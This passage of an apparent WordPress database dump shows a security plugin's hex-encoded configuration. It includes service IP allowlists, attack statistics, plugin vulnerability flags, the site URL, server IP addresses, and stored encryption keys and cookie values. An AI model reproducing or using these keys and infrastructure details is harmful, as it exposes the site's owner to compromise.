382E305C2F3234222C223135372E3234302E302E305C2F3234222C223135372E3234302E312E305C2F3234222C223135372E3234302E322E305C2F3234222C223135372E3234302E332E305C2F3234222C223135372E3234302E342E305C2F3234222C223135372E3234302E352E305C2F3234222C223135372E3234302E362E305C2F3234222C223135372E3234302E372E305C2F3234222C223135372E3234302E392E305C2F3234222C223135372E3234302E31302E305C2F3234222C223135372E3234302E31362E305C2F3234222C223135372E3234302E31392E305C2F3234222C223135372E3234302E31312E305C2F3234222C223135372E3234302E31322E305C2F3234222C223135372E3234302E31332E305C2F3234222C223135372E3234302E31342E305C2F3234222C223135372E3234302E31352E305C2F3234222C223135372E3234302E31372E305C2F3234222C223135372E3234302E31382E305C2F3234222C223135372E3234302E32302E305C2F3234222C223135372E3234302E32312E305C2F3234222C223135372E3234302E32322E305C2F3234222C223135372E3234302E32332E305C2F3234222C223135372E3234302E302E305C2F3137222C2236392E3137312E3235302E305C2F3234222C223135372E3234302E32342E305C2F3234222C223135372E3234302E32352E305C2F3234222C223139392E3230312E36342E305C2F3234222C223139392E3230312E36352E305C2F3234222C223139392E3230312E36342E305C2F3232222C223230342E31352E32302E305C2F3232222C223135372E3234302E3139322E305C2F3234222C223132392E3133342E302E305C2F3137222C223230342E31352E32302E305C2F3232222C2236392E36332E3137362E305C2F3230222C2236392E36332E3137362E305C2F3231222C2236392E36332E3138342E305C2F3231222C2236362E3232302E3134342E305C2F3230222C2236392E36332E3137362E305C2F3230222C22323632303A303A316330303A3A5C2F3430222C22326130333A323838303A3A5C2F3332222C22326130333A323838303A666666653A3A5C2F3438222C22326130333A323838303A666666663A3A5C2F3438222C22323632303A303A316366663A3A5C2F3438222C22326130333A323838303A663030303A3A5C2F3438222C22326130333A323838303A663030313A3A5C2F3438222C22326130333A323838303A663030323A3A5C2F3438222C22326130333A323838303A663030333A3A5C2F3438222C22326130333A323838303A663030343A3A5C2F3438222C22326130333A323838303A663030353A3A5C2F3438222C22326130333A323838303A663030363A3A5C2F3438222C22326130333A323838303A663030373A3A5C2F3438222C22326130333A323838303A663030383A3A5C2F3438222C22326130333A323838303A663030393A3A5C2F3438222C22326130333A323838303A663030613A3A5C2F3438222C22326130333A323838303A663030623A3A5C2F3438222C22326130333A323838303A663030633A3A5C2F3438222C22326130333A323838303A663030643A3A5C2F3438222C22326130333A323838303A663030653A3A5C2F3438222C22326130333A323838303A663030663A3A5C2F3438222C22326130333A323838303A663031303A3A5C2F3438222C22326130333A323838303A663031313A3A5C2F3438222C22326130333A323838303A663031323A3A5C2F3438222C22326130333A323838303A663031333A3A5C2F3438222C22326130333A323838303A663031343A3A5C2F3438222C22326130333A323838303A663031353A3A5C2F3438222C22326130333A323838303A663031363A3A5C2F3438222C22326130333A323838303A663031373A3A5C2F3438222C22326130333A323838303A663031383A3A5C2F3438222C22326130333A323838303A663031393A3A5C2F3438222C22326130333A323838303A663031613A3A5C2F3438222C22326130333A323838303A663031623A3A5C2F3438222C22326130333A323838303A663031633A3A5C2F3438222C22326130333A323838303A663031643A3A5C2F3438222C22326130333A323838303A663031653A3A5C2F3438222C22326130333A323838303A663031663A3A5C2F3438222C22326130333A323838303A313030303A3A5C2F3336222C22326130333A323838303A323030303A3A5C2F3336222C22326130333A323838303A333030303A3A5C2F3336222C22326130333A323838303A343030303A3A5C2F3336222C22326130333A323838303A353030303A3A5C2F3336222C22326130333A323838303A363030303A3A5C2F3336222C22326130333A323838303A373030303A3A5C2F3336222C22326130333A323838303A663032303A3A5C2F3438222C22326130333A323838303A663032313A3A5C2F3438222C22326130333A323838303A663032323A3A5C2F3438222C22326130333A323838303A663032333A3A5C2F3438222C22326130333A323838303A663032343A3A5C2F3438222C22326130333A323838303A663032353A3A5C2F3438222C22326130333A323838303A663032363A3A5C2F3438222C22326130333A323838303A663032373A3A5C2F3438222C22326130333A323838303A663032383A3A5C2F3438222C22326130333A323838303A663032393A3A5C2F3438222C22326130333A323838303A663032623A3A5C2F3438222C22326130333A323838303A663032633A3A5C2F3438222C22326130333A323838303A663032643A3A5C2F3438222C22326130333A323838303A663032653A3A5C2F3438222C22326130333A323838303A663032663A3A5C2F3438222C22326130333A323838303A663033303A3A5C2F3438222C22326130333A323838303A663033313A3A5C2F3438222C22326130333A323838303A663033323A3A5C2F3438222C22326130333A323838303A663033333A3A5C2F3438222C22326130333A323838303A663033343A3A5C2F3438222C22326130333A323838303A663033353A3A5C2F3438222C22326130333A323838303A663033363A3A5C2F3438222C22326130333A323838303A663033373A3A5C2F3438222C22326130333A323838303A663033383A3A5C2F3438222C22326130333A323838303A663033393A3A5C2F3438222C22326130333A323838303A663033613A3A5C2F3438222C22326130333A323838303A663033623A3A5C2F3438222C22326130333A323838303A663033633A3A5C2F3438222C22326130333A323838303A663033643A3A5C2F3438222C22326130333A323838303A663033653A3A5C2F3438222C22326130333A323838303A663033663A3A5C2F3438222C22323430313A646230303A3A5C2F3332222C22326130333A323838303A3A5C2F3336222C22323830333A363038303A3A5C2F3332222C22326130333A323838303A663130303A3A5C2F3438222C22326130333A323838303A663230303A3A5C2F3438222C22326130333A323838303A663130313A3A5C2F3438222C22326130333A323838303A663230313A3A5C2F3438222C22326130333A323838303A663130323A3A5C2F3438222C22326130333A323838303A663230323A3A5C2F3438222C22326130333A323838303A663130333A3A5C2F3438222C22326130333A323838303A663230333A3A5C2F3438222C22326130333A323838303A663130343A3A5C2F3438222C22326130333A323838303A663230343A3A5C2F3438222C22326130333A323838303A663130373A3A5C2F3438222C22326130333A323838303A663230373A3A5C2F3438222C22326130333A323838303A663130383A3A5C2F3438222C22326130333A323838303A663230383A3A5C2F3438222C22326130333A323838303A663130393A3A5C2F3438222C22326130333A323838303A663230393A3A5C2F3438222C22326130333A323838303A663130613A3A5C2F3438222C22326130333A323838303A663230613A3A5C2F3438222C22326130333A323838303A663130623A3A5C2F3438222C22326130333A323838303A663230623A3A5C2F3438222C22326130333A323838303A663130643A3A5C2F3438222C22326130333A323838303A663230643A3A5C2F3438222C22326130333A323838303A663130653A3A5C2F3438222C22326130333A323838303A663230653A3A5C2F3438222C22326130333A323838303A663130663A3A5C2F3438222C22326130333A323838303A663230663A3A5C2F3438222C22326130333A323838303A663131303A3A5C2F3438222C22326130333A323838303A663231303A3A5C2F3438222C22326130333A323838303A663131313A3A5C2F3438222C22326130333A323838303A663231313A3A5C2F3438222C22326130333A323838303A663131323A3A5C2F3438222C22326130333A323838303A663231323A3A5C2F3438222C22326130333A323838303A663131343A3A5C2F3438222C22326130333A323838303A663231343A3A5C2F3438222C22326130333A323838303A663131353A3A5C2F3438222C22326130333A323838303A663231353A3A5C2F3438222C22326130333A323838303A663131363A3A5C2F3438222C22326130333A323838303A663231363A3A5C2F3438222C22326130333A323838303A663131373A3A5C2F3438222C22326130333A323838303A663231373A3A5C2F3438222C22326130333A323838303A663131383A3A5C2F3438222C22326130333A323838303A663231383A3A5C2F3438222C22326130333A323838303A663131393A3A5C2F3438222C22326130333A323838303A663231393A3A5C2F3438222C22326130333A323838303A663131613A3A5C2F3438222C22326130333A323838303A663231613A3A5C2F3438222C22326130333A323838303A663131663A3A5C2F3438222C22326130333A323838303A663231663A3A5C2F3438222C22326130333A323838303A663132313A3A5C2F3438222C22326130333A323838303A663232313A3A5C2F3438222C22326130333A323838303A663132323A3A5C2F3438222C22326130333A323838303A663232323A3A5C2F3438222C22326130333A323838303A663132333A3A5C2F3438222C22326130333A323838303A663232333A3A5C2F3438222C22326130333A323838303A663130633A3A5C2F3438222C22326130333A323838303A663230633A3A5C2F3438222C22326130333A323838303A663132363A3A5C2F3438222C22326130333A323838303A663232363A3A5C2F3438222C22326130333A323838303A663130353A3A5C2F3438222C22326130333A323838303A663230353A3A5C2F3438222C22326130333A323838303A663132353A3A5C2F3438222C22326130333A323838303A663232353A3A5C2F3438222C22326130333A323838303A663130363A3A5C2F3438222C22326130333A323838303A663230363A3A5C2F3438222C22326130333A323838303A663131623A3A5C2F3438222C22326130333A323838303A663231623A3A5C2F3438222C22326130333A323838303A663131333A3A5C2F3438222C22326130333A323838303A663231333A3A5C2F3438222C22326130333A323838303A663131633A3A5C2F3438222C22326130333A323838303A663231633A3A5C2F3438222C22326130333A323838303A663132383A3A5C2F3438222C22326130333A323838303A663232383A3A5C2F3438222C22326130333A323838303A663032613A3A5C2F3438222C22326130333A323838303A663132613A3A5C2F3438222C22326130333A323838303A663232613A3A5C2F3438222C22326130333A323838303A663132663A3A5C2F3438222C22326130333A323838303A663232663A3A5C2F3438222C22326130333A323838303A663131643A3A5C2F3438222C22326130333A323838303A663131653A3A5C2F3438222C22326130333A323838303A663132303A3A5C2F3438222C22326130333A323838303A663132343A3A5C2F3438222C22326130333A323838303A663132373A3A5C2F3438222C22326130333A323838303A663132393A3A5C2F3438222C22326130333A323838303A663132623A3A5C2F3438222C22326130333A323838303A663132633A3A5C2F3438222C22326130333A323838303A663132643A3A5C2F3438222C22326130333A323838303A663132653A3A5C2F3438222C22326130333A323838303A663133303A3A5C2F3438222C22326130333A323838303A663133313A3A5C2F3438222C22326130333A323838303A663133323A3A5C2F3438222C22326130333A323838303A663133333A3A5C2F3438222C22326130333A323838303A663133343A3A5C2F3438222C22326130333A323838303A663133353A3A5C2F3438222C22326130333A323838303A663133363A3A5C2F3438222C22326130333A323838303A663133373A3A5C2F3438222C22326130333A323838303A663133383A3A5C2F3438222C22326130333A323838303A663133393A3A5C2F3438222C22326130333A323838303A663133613A3A5C2F3438222C22326130333A323838303A663133623A3A5C2F3438222C22326130333A323838303A663133633A3A5C2F3438222C22326130333A323838303A663133643A3A5C2F3438222C22326130333A323838303A663133653A3A5C2F3438222C22326130333A323838303A663133663A3A5C2F3438222C22326130333A323838303A663231643A3A5C2F3438222C22326130333A323838303A663231653A3A5C2F3438222C22326130333A323838303A663232303A3A5C2F3438222C22326130333A323838303A663232343A3A5C2F3438222C22326130333A323838303A663232373A3A5C2F3438222C22326130333A323838303A663232393A3A5C2F3438222C22326130333A323838303A663232623A3A5C2F3438222C22326130333A323838303A663232633A3A5C2F3438222C22326130333A323838303A663232643A3A5C2F3438222C22326130333A323838303A663232653A3A5C2F3438222C22326130333A323838303A663233303A3A5C2F3438222C22326130333A323838303A663233313A3A5C2F3438222C22326130333A323838303A663233323A3A5C2F3438222C22326130333A323838303A663233333A3A5C2F3438222C22326130333A323838303A663233343A3A5C2F3438222C22326130333A323838303A663233353A3A5C2F3438222C22326130333A323838303A663233363A3A5C2F3438222C22326130333A323838303A663233373A3A5C2F3438222C22326130333A323838303A663233383A3A5C2F3438222C22326130333A323838303A663233393A3A5C2F3438222C22326130333A323838303A663233613A3A5C2F3438222C22326130333A323838303A663233623A3A5C2F3438222C22326130333A323838303A663233633A3A5C2F3438222C22326130333A323838303A663233643A3A5C2F3438222C22326130333A323838303A663233653A3A5C2F3438222C22326130333A323838303A663233663A3A5C2F3438222C22326130333A323838303A663066663A3A5C2F3438222C22326130333A323838303A663166663A3A5C2F3438222C22326130333A323838303A663266663A3A5C2F3438222C22326330663A656637383A303030333A3A5C2F3438225D7D2C22757074696D65726F626F74223A7B226E223A22557074696D6520526F626F74222C2264223A747275652C2272223A5B2236392E3136322E3132342E3232345C2F3238222C2236332E3134332E34322E3234305C2F3238225D7D2C2273746174757363616B65223A7B226E223A2253746174757343616B65222C2264223A747275652C2272223A5B223130332E3139342E3131322E3730222C223130342E3133312E3234372E313531222C223130342E3133312E3234382E3635222C223130342E3133312E3234382E3738222C223130342E3135362E3232392E3234222C223130342E3135362E3235352E313834222C223130342E3230362E3136382E3236222C223130342E3233382E3136342E313035222C223130372E3135302E312E313335222C223130372E3135352E3130342E313832222C223130372E3135352E3130382E323334222C223130372E3135352E3132352E3239222C223130372E3136312E32382E323139222C223130372E3137302E3139372E323438222C223130372E3137302E3231392E3436222C223130372E3137302E3232372E3233222C223130372E3137302E3232372E3234222C223130372E3137302E3234302E313431222C223130372E3137302E35332E313931222C223130372E3139312E34372E313331222C223130372E3139312E35372E323337222C223130382E36312E3131392E313533222C223130382E36312E3136322E323134222C223130382E36312E3230352E323031222C223130382E36312E3231322E313431222C223130382E36312E3231352E313739222C223132352E36332E34382E323339222C223132382E3139392E3232322E3635222C223133382E3139372E3133302E323332222C223133382E3139372E3133302E323335222C223133382E3139372E3134302E323433222C223133382E3230342E3137312E313336222C223133382E36382E32342E313135222C223133382E36382E32342E313336222C223133382E36382E32342E323037222C223133382E36382E32342E3630222C223133382E36382E38302E3130222C223133382E36382E38302E313733222C223133392E35392E31352E3739222C223133392E35392E3135352E3236222C223133392E35392E3139302E323431222C223133392E35392E32322E313039222C223133392E35392E32362E3835222C223133392E35392E32392E313637222C223134392E3135342E3135372E3631222C223134392E3235352E35392E313030222C223135312E3233362E31302E323338222C223135312E3233362E31382E3830222C223135312E38302E3137352E323233222C223135312E38302E3137352E323236222C223135342E3132372E36302E3233222C223135342E3132372E36302E3539222C223135382E3235352E3230382E3736222C223135392E3230332E3138322E3232222C223135392E3230332E3138322E3630222C223135392E3230332E3138362E323235222C223135392E3230332E33312E3138222C223136322E3234332E3234372E313633222C223136322E3234332E37312E3536222C223136322E3234382E39372E3732222C223136322E3235332E36342E313034222C223136322E3235332E36342E3837222C223137362E35362E3233302E313130222C223137382E36322E3130312E3537222C223137382E36322E3130342E313337222C223137382E36322E3130362E3834222C223137382E36322E3130392E37222C223137382E36322E34302E323333222C223137382E36322E34312E3434222C223137382E36322E34312E3439222C223137382E36322E34312E3532222C223137382E36322E36352E313632222C223137382E36322E37312E323237222C223137382E36322E37382E313939222C223137382E36322E38302E3933222C223137382E36322E38362E3639222C223137382E37332E3231302E3939222C223138312E34312E3230312E313137222C223138312E34312E3231342E313337222C223138352E3131322E3135372E313835222C223138352E31322E34352E3730222C223138352E34372E3132392E313638222C223138352E36302E3133352E3836222C223138382E3136362E3135382E323234222C223138382E3136362E3235332E313438222C223138382E3232362E3133392E313538222C223138382E3232362E3135382E313630222C223138382E3232362E3136392E323238222C223138382E3232362E3137312E3538222C223138382E3232362E3138342E313532222C223138382E3232362E3138352E313036222C223138382E3232362E3138362E313939222C223138382E3232362E3230332E3834222C223138382E3232362E3234372E313834222C223138382E36382E3233382E3739222C223139322E3234312E3232312E3131222C223139332E3132342E3137382E3534222C223139332E3132342E3137382E3631222C223139332E3138322E3134342E313035222C223139332E3138322E3134342E313437222C223139392E3136372E3132382E3830222C223230392E3232322E33302E323432222C223231332E3138332E35362E313037222C223231372E3134382E34332E313838222C223231372E3134382E34332E323032222C2233312E3232302E372E323337222C2233372E3135372E3234362E313436222C2233372E3233352E34382E3432222C2233372E3233352E35322E3235222C2233372E3233352E35332E323430222C2233372E3233352E35352E323035222C2233372E39372E3138382E313033222C2234352E33322E3132382E3830222C2234352E33322E3134352E3739222C2234352E33322E3135312E3231222C2234352E33322E3136302E313732222C2234352E33322E3136362E313935222C2234352E33322E3137312E3234222C2234352E33322E3139322E313938222C2234352E33322E3139352E313836222C2234352E33322E3139352E3933222C2234352E33322E3231322E3536222C2234352E33322E33362E313538222C2234352E33322E372E3232222C2234352E36332E3132312E313539222C2234352E36332E32362E3738222C2234352E36332E35312E3633222C2234352E36332E36312E323133222C2234352E36332E37362E3638222C2234352E36332E37382E3834222C2234352E36332E38362E313230222C2234352E36332E38382E323133222C2234352E37362E312E3434222C2234352E37362E3139322E3530222C2234352E37362E332E313132222C2234362E3130312E302E3234222C2234362E3130312E3131302E3332222C2234362E3130312E3131302E3433222C2234362E3130312E3131302E3435222C2234362E3130312E32302E3936222C2234362E3130312E3233382E313832222C2234362E3130312E3233382E313839222C2234362E3130312E3234302E323038222C2234362E3130312E32372E313836222C2234362E3130312E36312E3833222C2234362E3130312E37342E323531222C22352E34352E3137392E313033222C2235302E322E3133392E3136222C2238322E3232312E39352E313631222C2239312E3233362E3131362E313633225D7D2C226D616E6167657770223A7B226E223A224D616E6167655750222C2264223A66616C73652C2272223A5B2233342E3231312E3138302E3636222C2235342E37302E36352E313037222C2233342E3231302E3232342E37222C2235322E34312E352E313038222C2235322E33352E37322E313239222C2235342E3139312E3133372E3137222C2233352E3136322E3235342E323533222C2235322E31312E31322E323331222C2235322E31312E32392E3730222C2235322E31312E35342E313631222C2235322E32342E3134322E313539222C2235322E32352E3139312E323535222C2235322E32372E3138312E313236222C2235322E33342E3132362E313137222C2235322E33342E3235342E3437222C2235322E33352E38322E3939222C2235322E33362E32382E3830222C2235322E33382E3130362E3937222C2235322E33392E3137372E313532222C2235322E34312E3233302E313438222C2235322E34312E3233372E3132222C2235322E34322E3132362E313636222C2235322E34332E31332E3731222C2235322E34332E37362E323234222C2235322E38382E39362E313130222C2235322E38392E3135352E3531222C2235342E3134382E37332E313138222C2235342E3138362E33372E313035222C2235342E3138372E39322E3537222C2235342E3139312E33322E3635222C2235342E3139312E36372E3233222C2235342E3139312E38302E313139222C2235342E3139312E3133352E323039222C2235342E3139312E3133362E313736222C2235342E3139312E3134382E3835222C2235342E3139312E3134392E38222C2235322E32362E3132322E3231222C2235322E32342E3138372E3239222C2235322E38392E38352E313037222C2235342E3138362E3132382E313637222C2235342E3139312E34302E313336222C2235322E32342E36322E3131222C2235322E38382E3131392E313232222C2235342E3139312E3134382E323235222C2235342E3139312E3135312E3138222C2235322E38392E39342E313231222C2235322E32352E3131362E313136222C2235322E38382E3231352E323235222C2235342E3138362E3134332E313834222C2235322E38382E3139372E313830222C2235322E32372E3137312E313236225D7D2C2273657A6E616D223A7B226E223A2253657A6E616D2053656172636820456E67696E65222C2264223A747275652C2272223A5B2237372E37352E37342E305C2F3234222C2237372E37352E37362E305C2F3234222C2237372E37352E37372E305C2F3234222C2237372E37352E37382E305C2F3234222C2237372E37352E37392E305C2F3234222C22326130323A3539383A613A3A37383A305C2F313132222C22326130323A3539383A613A3A37393A305C2F313132222C22326130323A3539383A323A3A305C2F3936225D7D7D,'yes'),('whitelistHash',0x62663364373664633035636166383632336362336665303163316663396533303865326632656133376238323639333764383530666465333631636465666434,'yes'),('touppPromptNeeded','','yes'),('touppBypassNextCheck',0x30,'yes'),('autoUpdateAttempts',0x30,'yes'),('wfPeakMemory',0x3337373438373336,'no'),('previousWflogsFileList',0x5B2272756C65732E706870222C22636F6E6669672E706870222C22636F6E6669672D73796E6365642E706870222C22636F6E6669672D7472616E7369656E742E706870222C2274656D706C6174652E706870222C2247656F4C697465322D436F756E7472792E6D6D6462222C2261747461636B2D646174612E706870222C226970732E706870222C222E6874616363657373222C22636F6E6669672D6C6976657761662E706870225D,'yes'),('diagnosticsWflogsRemovalHistory',0x5B5D,'no'),('encKey',0x36323731336262616264663337646366,'yes'),('longEncKey',0x31346166633462363439616533626362643263393932643365303433656263313533323536376634346535393634333765663736386234613064623234616234,'yes'),('cbl_restOfSiteBlocked',0x31,'yes'),('timeoffset_wf',0x30,'yes'),('lastBlockAggregation',0x31373030353338333838,'yes'),('allowed404s6116Migration',0x31,'yes'),('migration636_email_summary_excluded_directories',0x31,'no'),('fileContentsGSB6315Migration',0x31,'yes'),('config701Migration',0x31,'yes'),('blocks702Migration',0x31,'yes'),('geoIPVersionHash',0x61313231346163616331623331303961653531656165363334396662303435636566346235333334366565363538343065646266383466613066616439363737,'yes'),('scansEnabled_geoipSupport',0x31,'yes'),('config720Migration',0x31,'yes'),('waf_status',0x656E61626C6564,'yes'),('detectProxyNextCheck',0x31373030373630313335,'no'),('detectProxyNonce','','no'),('serverIP',0x313730303135353333363B3137332E3233312E3233312E323035,'yes'),('allScansScheduled',0x613A323A7B693A303B613A323A7B733A393A2274696D657374616D70223B693A313730303637333630303B733A343A2261726773223B613A313A7B693A303B693A313730303637333630303B7D7D693A313B613A323A7B733A393A2274696D657374616D70223B693A313730303933323830303B733A343A2261726773223B613A313A7B693A303B693A313730303933323830303B7D7D7D,'yes'),('scanMonitorRemainingResumeAttempts',0x30,'yes'),('activatingIP',0x37362E3133302E3132302E313938,'yes'),('cbl_cookieVal',0x35643464633064383539643235,'yes'),('serverDNS',0x313730303535393030343B31383B3137332E3233312E3233312E323035,'yes'),('adminNoticeQueue',0x613A303A7B7D,'yes'),('wp_home_url',0x68747470733A2F2F65636B616E6B61722D636F6C6F7261646F2E6F7267,'yes'),('wp_site_url',0x68747470733A2F2F65636B616E6B61722D636F6C6F7261646F2E6F7267,'yes'),('dbVersion',0x31302E362E31362D4D617269614442,'yes'),('lastDashboardCheck',0x31373030353833313836,'yes'),('dashboardData',0x613A343A7B733A393A2267656E657261746564223B693A313730303537363835393B733A333A22746466223B613A333A7B733A393A22636F6D6D756E697479223B693A353739363B733A373A227072656D69756D223B693A353838383B733A393A22626C61636B6C697374223B693A31333436303B7D733A31303A2261747461636B64617461223B613A333A7B733A333A22323468223B613A32343A7B693A303B613A323A7B733A313A2274223B693A313730303438383830303B733A313A2263223B693A31353738363934343B7D693A313B613A323A7B733A313A2274223B693A313730303439323430303B733A313A2263223B693A31343739373532313B7D693A323B613A323A7B733A313A2274223B693A313730303439363030303B733A313A2263223B693A31343339323030373B7D693A333B613A323A7B733A313A2274223B693A313730303439393630303B733A313A2263223B693A31343335393733333B7D693A343B613A323A7B733A313A2274223B693A313730303530333230303B733A313A2263223B693A31343437363930303B7D693A353B613A323A7B733A313A2274223B693A313730303530363830303B733A313A2263223B693A31353034353934353B7D693A363B613A323A7B733A313A2274223B693A313730303531303430303B733A313A2263223B693A31353131343339363B7D693A373B613A323A7B733A313A2274223B693A313730303531343030303B733A313A2263223B693A31343833353632373B7D693A383B613A323A7B733A313A2274223B693A313730303531373630303B733A313A2263223B693A31343333303634303B7D693A393B613A323A7B733A313A2274223B693A313730303532313230303B733A313A2263223B693A31333838343230343B7D693A31303B613A323A7B733A313A2274223B693A313730303532343830303B733A313A2263223B693A31333836343939313B7D693A31313B613A323A7B733A313A2274223B693A313730303532383430303B733A313A2263223B693A31333336383237313B7D693A31323B613A323A7B733A313A2274223B693A313730303533323030303B733A313A2263223B693A31343237363438313B7D693A31333B613A323A7B733A313A2274223B693A313730303533353630303B733A313A2263223B693A31343430343838363B7D693A31343B613A323A7B733A313A2274223B693A313730303533393230303B733A313A2263223B693A31333831343036333B7D693A31353B613A323A7B733A313A2274223B693A313730303534323830303B733A313A2263223B693A31353038353336303B7D693A31363B613A323A7B733A313A2274223B693A313730303534363430303B733A313A2263223B693A31383037373938373B7D693A31373B613A323A7B733A313A2274223B693A313730303535303030303B733A313A2263223B693A31393934313938363B7D693A31383B613A323A7B733A313A2274223B693A313730303535333630303B733A313A2263223B693A32313130383032313B7D693A31393B613A323A7B733A313A2274223B693A313730303535373230303B733A313A2263223B693A32303730383333313B7D693A32303B613A323A7B733A313A2274223B693A313730303536303830303B733A313A2263223B693A32303039353737323B7D693A32313B613A323A7B733A313A2274223B693A313730303536343430303B733A313A2263223B693A31393138393034303B7D693A32323B613A323A7B733A313A2274223B693A313730303536383030303B733A313A2263223B693A31383832333731313B7D693A32333B613A323A7B733A313A2274223B693A313730303537313630303B733A313A2263223B693A31373831373232363B7D7D733A323A223764223B613A373A7B693A303B613A323A7B733A313A2274223B693A313639393932303030303B733A313A2263223B693A3436363039343530353B7D693A313B613A323A7B733A313A2274223B693A313730303030363430303B733A313A2263223B693A3531353231393539383B7D693A323B613A323A7B733A313A2274223B693A313730303039323830303B733A313A2263223B693A3533343230343438353B7D693A333B613A323A7B733A313A2274223B693A313730303137393230303B733A313A2263223B693A3535323130353034313B7D693A343B613A323A7B733A313A2274223B693A313730303236353630303B733A313A2263223B693A3431333434313937363B7D693A353B613A323A7B733A313A2274223B693A313730303335323030303B733A313A2263223B693A3430383835353937303B7D693A363B613A323A7B733A313A2274223B693A313730303433383430303B733A313A2263223B693A3433343837313836363B7D7D733A333A22333064223B613A33303A7B693A303B613A323A7B733A313A2274223B693A313639373933323830303B733A313A2263223B693A3236313437323436343B7D693A313B613A323A7B733A313A2274223B693A313639383031393230303B733A313A2263223B693A3234363234343035393B7D693A323B613A323A7B733A313A2274223B693A313639383130353630303B733A313A2263223B693A3238333134373031323B7D693A333B613A323A7B733A313A2274223B693A313639383139323030303B733A313A2263223B693A3237353638353037313B7D693A343B613A323A7B733A313A2274223B693A313639383237383430303B733A313A2263223B693A3237303130323738333B7D693A353B613A323A7B733A313A2274223B693A313639383336343830303B733A313A2263223B693A3237303233323138363B7D693A363B613A323A7B733A313A2274223B693A313639383435313230303B733A313A2263223B693A3332363938353938373B7D693A373B613A323A7B733A313A2274223B693A313639383533373630303B733A313A2263223B693A3238323731303234333B7D693A383B613A323A7B733A313A2274223B693A313639383632343030303B733A313A2263223B693A3330383634373736333B7D693A393B613A323A7B733A313A2274223B693A313639383731303430303B733A313A2263223B693A3239353236383336303B7D693A31303B613A323A7B733A313A2274223B693A313639383739363830303B733A313A2263223B693A3332353138333037313B7D693A31313B613A323A7B733A313A2274223B693A313639383838333230303B733A313A2263223B693A3433393638353333313B7D693A31323B613A323A7B733A313A2274223B693A313639383936393630303B733A313A2263223B693A3439313134373630333B7D693A31333B613A323A7B733A313A2274223B693A313639393035363030303B733A313A2263223B693A3531333333333830393B7D693A31343B613A323A7B733A313A2274223B693A313639393134323430303B733A313A2263223B693A3331383031323730383B7D693A31353B613A323A7B733A313A2274223B693A313639393232383830303B733A313A2263223B693A3238383132373035343B7D693A31363B613A323A7B733A313A2274223B693A313639393331353230303B733A313A2263223B693A3339373832393439323B7D693A31373B613A323A7B733A313A2274223B693A313639393430313630303B733A313A2263223B693A3432303032373030383B7D693A31383B613A323A7B733A313A2274223B693A313639393438383030303B733A313A2263223B693A3435303938383831393B7D693A31393B613A323A7B733A313A2274223B693A313639393537343430303B733A313A2263223B693A3437303539313036343B7D693A32303B613A323A7B733A313A2274223B693A313639393636303830303B733A313A2263223B693A3435303938393730343B7D693A32313B613A323A7B733A313A2274223B693A313639393734373230303B733A313A2263223B693A3437333138353731343B7D693A32323B613A323A7B733A313A2274223B693A313639393833333630303B733A313A2263223B693A3436353237313936393B7D693A32333B613A323A7B733A313A2274223B693A313639393932303030303B733A313A2263223B693A3436363039343530353B7D693A32343B613A323A7B733A313A2274223B693A313730303030363430303B733A313A2263223B693A3531353231393539383B7D693A32353B613A323A7B733A313A2274223B693A313730303039323830303B733A313A2263223B693A3533343230343438353B7D693A32363B613A323A7B733A313A2274223B693A313730303137393230303B733A313A2263223B693A3535323130353034313B7D693A32373B613A323A7B733A313A2274223B693A313730303236353630303B733A313A2263223B693A3431333434313937363B7D693A32383B613A323A7B733A313A2274223B693A313730303335323030303B733A313A2263223B693A3430383835353937303B7D693A32393B613A323A7B733A313A2274223B693A313730303433383430303B733A313A2263223B693A3433343837313836363B7D7D7D733A393A22636F756E7472696573223B613A313A7B733A323A223764223B613A31303A7B693A303B613A323A7B733A323A226364223B733A323A225553223B733A323A226374223B693A3635353535383734303B7D693A313B613A323A7B733A323A226364223B733A323A224E4C223B733A323A226374223B693A3235363338333737333B7D693A323B613A323A7B733A323A226364223B733A323A225347223B733A323A226374223B693A3139353730303739383B7D693A333B613A323A7B733A323A226364223B733A323A224445223B733A323A226374223B693A3138313938383537313B7D693A343B613A323A7B733A323A226364223B733A323A224652223B733A323A226374223B693A3133343233363731383B7D693A353B613A323A7B733A323A226364223B733A323A22494E223B733A323A226374223B693A3130353436393539353B7D693A363B613A323A7B733A323A226364223B733A323A224742223B733A323A226374223B693A38343330323633393B7D693A373B613A323A7B733A323A226364223B733A323A22434E223B733A323A226374223B693A37343538343438323B7D693A383B613A323A7B733A323A226364223B733A323A22564E223B733A323A226374223B693A35373830323037353B7D693A393B613A323A7B733A323A226364223B733A323A224944223B733A323A226374223B693A34303939383231363B7D7D7D7D,'yes'),('noc1ScanSchedule',0x613A323A7B693A303B693A313730303637333630303B693A313B693A313730303933323830303B7D,'yes'),('showWfCentralUI',0x31,'yes'),('allowMySQLi',0x31,'yes'),('dbTest',0x613A313A7B733A353A226E6F6E6365223B733A36343A2239343830393731616531313736366337666665363035663935323731336363646633643132343263343339373939626565316262613465663864353537353262223B7D,'no'),('vulnerabilities_plugin',0x613A34303A7B693A303B613A353A7B733A343A22736C7567223B733A32353A22616476616E6365642D676F6F676C652D726563617074636861223B733A31313A2266726F6D56657273696F6E223B733A343A22312E3132223B733A31303A2276756C6E657261626C65223B623A303B733A393A22746F56657273696F6E223B733A343A22312E3134223B733A343A226C696E6B223B623A303B7D693A313B613A353A7B733A343A22736C7567223B733A32343A226D6F64756C612D626573742D677269642D67616C6C657279223B733A31313A2266726F6D56657273696F6E223B733A353A22322E372E38223B733A31303A2276756C6E657261626C65223B623A303B733A393A22746F56657273696F6E223B733A353A22322E372E39223B733A343A226C696E6B223B623A303B7D693A323B613A353A7B733A343A22736C7567223B733A31313A2272656469732D6361636865223B733A31313A2266726F6D56657273696F6E223B733A353A22322E342E34223B733A31303A2276756C6E657261626C65223B623A303B733A393A22746F56657273696F6E223B733A353A22322E352E30223B733A343A226C696E6B223B623A303B7D693A333B613A353A7B733A343A22736C7567223B733A31303A2277702D73746167696E67223B733A31313A2266726F6D56657273696F6E223B733A353A22332E312E32223B733A31303A2276756C6E657261626C65223B623A303B733A393A22746F56657273696F6E223B733A353A22332E312E33223B733A343A226C696E6B223B623A303B7D693A343B613A343A7B733A343A22736C7567223B733A31363A2274696E796D63652D616476616E636564223B733A31313A2266726F6D56657273696F6E223B733A353A22352E392E32223B733A31303A2276756C6E657261626C65223B623A303B733A343A226C696E6B223B623A303B7D693A353B613A343A7B733A343A22736C7567223B733A31363A226173796E632D6A617661736372697074223B733A31313A2266726F6D56657273696F6E223B733A31303A22322E32312E30382E3331223B733A31303A2276756C6E657261626C65223B623A303B733A343A226C696E6B223B623A303B7D693A363B613A343A7B733A343A22736C7567223B733A31313A226175746F7074696D697A65223B733A31313A2266726F6D56657273696F6E